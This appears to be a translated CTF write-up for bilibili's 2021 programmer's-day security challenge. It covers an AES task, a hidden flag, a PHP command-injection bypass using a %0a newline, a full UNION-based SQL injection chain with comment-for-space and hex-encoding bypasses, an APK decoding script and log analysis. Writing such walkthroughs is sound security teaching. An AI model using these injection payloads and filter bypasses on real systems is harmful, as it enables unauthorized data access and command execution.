bilibili 2021 1024 programmer's day security attack and defense challenge

Title address: https://www.bilibili.com/blackboard/20211024.html

Topic 1

AES decryption, password: happy_1024_2233. The ciphertext is the bottom two lines of characters, which need to be spelled into one line (I really didn't expect this at first!)

Online decryption website: http://tool.chacuo.net/cryptaes

Topic 2

F12, find the hidden flag in home.vue

Topic 3

Download the compressed package and extract it to get eval.php

<?php
    /* 
        bilibili- ( ゜- ゜)つロ Cheers~
        uat: http://192.168.3.2/uat/eval.php
        pro: http://security.bilibili.com/sec1024/q/pro/eval.php
    */
    $args = @$_GET['args'];
    if (count($args) >3) {
        exit();
    }
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) ) {
            exit();
        }
    }
    // todo: other filter
    $cmd = "/bin/2233 " . implode(" ", $args);
    exec($cmd, $out);
    for ($i=0; $i<count($out); $i++){
        echo($out[$i]);
        echo('<br>');
    }
?>

The general idea is to pass in the command from the args parameter to find the flag. The args array element is limited to 3, and the regular matching / ^ \ w + $/ filters out special characters such as /,. And. Args also splices / bin/2233. The direct command cannot be executed normally. This can be bypassed by the end line break%0a, and then the command can be executed.

ls view files in the current directory

cat passwd gets the flag

Topic 4

The address is the same as topic 2, but there is no idea. Later, I got the prompt of sql injection. Again, I found an api interface under F12, which is some parameters for submitting log information through POST.

user_ There is an injection point at name, and spaces are filtered.

Get library name, q

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,database()",
    "action": "",
    "page": 1,
    "size": 20
}

Get table name, flag,log,user

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()",
    "action": "",
    "page": 1,
    "size": 20
}

Get the field name and id (quotation marks cannot be used here, otherwise it will be closed in advance, resulting in an error. It can be bypassed by hexadecimal. The hexadecimal of flag is 666c6167, preceded by 0x)

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167",
    "action": "",
    "page": 1,
    "size": 20
}

The last step is to get the flag

{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(id)/**/from/**/flag",
    "action": "",
    "page": 1,
    "size": 20
}

Topic 5

Download test.apk, enter the account name and password, and prompt "a little ~ ~" after submitting

Does that give flag when you input it correctly? Gradually forget the question. This question tests reverse analysis~

Refer to other solutions below:

JADX open

Encrypt is an encryption process. For two strings of characters in MainActivity, just press the reverse operation in encrypt once. That is, one base64 decoding, one XOR 3, and two strings can be combined into a string of flag s

Problem solving script

import base64
 
obyteArray = [0x59, 0x57, 0x42, 0x6c, 0x4f, 0x6d, 0x5a, 0x6e, 0x4e, 0x6a, 0x41, 0x75, 0x4f, 0x6d, 0x4a, 0x6d, 0x4e,
              0x7a,
              0x41, 0x78, 0x4f, 0x32, 0x59, 0x3d]
 
code = [0x4e, 0x6a, 0x49, 0x31, 0x4f, 0x7a, 0x41, 0x33, 0x59, 0x47, 0x41, 0x75, 0x4e, 0x6a, 0x4e, 0x6d, 0x4e, 0x7a,
        0x63, 0x37, 0x59, 0x6d, 0x55, 0x3d]
 
user = ""
 
password = ""
 
for i in range(24):
    user+=chr(obyteArray[i])
    password+=chr(code[i])
 
print(base64.b64decode(user))
print(base64.b64decode(password))
 
a1 = str(base64.b64decode(user),encoding="utf-8")
a2 = str(base64.b64decode(password),encoding="utf-8")
 
ans=""
ans1=""
for i1 in range(17):
    p=ord(a1[i1])^3
    ans+=chr(p)
    p1=ord(a2[i1])^3
    ans1+=chr(p1)
 
print(ans)
print(ans1)

Topic 6

Refer to: https://www.52pojie.cn/thread-1532604-1-1.html

Topic 7

For log analysis, you need to find out all malicious IP addresses. Some answers are as follows:

jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg

Tags: security CTF

Posted on Mon, 25 Oct 2021 10:57:29 -0400 by mark123